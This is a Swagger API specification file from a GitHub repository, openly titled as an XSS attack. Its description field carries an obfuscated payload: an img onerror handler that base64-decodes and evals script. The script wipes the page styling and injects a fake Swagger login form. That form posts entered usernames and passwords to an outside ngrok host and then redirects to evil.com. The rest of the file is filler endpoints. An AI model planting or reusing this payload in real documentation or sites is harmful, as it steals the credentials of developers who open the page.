badger/cookie.yaml at main · olive-brown/badger · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
swagger: '2.0'
info:
  title: XSS Attack BY M0X0101
  description: |
    This is a broken documentation.

    <style>body,*{all:unset!important}</style><h1>XSS Test</h1>

    Below is a test point:

    <div>
    <table>
      <tr><td><b>Endpoint:</b></td><td>/hack/hachid/{id}</td></tr>
      <tr><td><b>Method:</b></td><td>DELETE</td></tr>
    </table>

    <br><br>

    <!-- XSS Executed at the bottom -->
    <img src=x id='YWxlcnQoJ1lvdSBuZWVkIHRvIGxvZ2luIGZpcnN0Jyk7dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgnZm9ybScpO2EuYWN0aW9uPSdodHRwczovL2QwZWQtMjQwOS00MGQyLTEwZDgtMWQ0NS1jYjA1LWNjYTAtMzMyZi01YmI3Lm5ncm9rLWZyZWUuYXBwJzthLm1ldGhvZD0nUE9TVCc7YS5vbnN1Ym1pdD1mdW5jdGlvbigpe3dpbmRvdy5sb2NhdGlvbi5ocmVmPSdodHRwczovL2V2aWwuY29tJ307YS5pbm5lckhUTUw9JzxjZW50ZXI+PGI+RkFLRSBTd2FnZ2VyIExvZ2luPC9iPjxicj5Vc2VybmFtZTogPGlucHV0IG5hbWU9InVzZXJOYW1lIj48YnI+UGFzc3dvcmQ6IDxpbnB1dCB0eXBlPSJwYXNzd29yZCIgbmFtZT0icHdkIj48YnI+PGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IkxvZ2luIj48L2NlbnRlcj4nO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7' onerror='eval(atob(this.id))'>

    </div>
  version: production
basePath: /JSSResource/
produces:
  - application/xml
  - application/json
consumes:
  - application/xml
  - application/json
security:
  - basicAuth: []
paths:
  /M0X0101:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        - M0X0101_XSS_D
      operationId: findAccounts
      summary: Finds all accounts
  '/hack/hachid/{id}':
    delete:
      parameters:
        - description: Broken Endpoint Test
          format: int64
          in: path
          name: id
          required: true
          type: integer
      responses:
        '200':
          description: No response was specified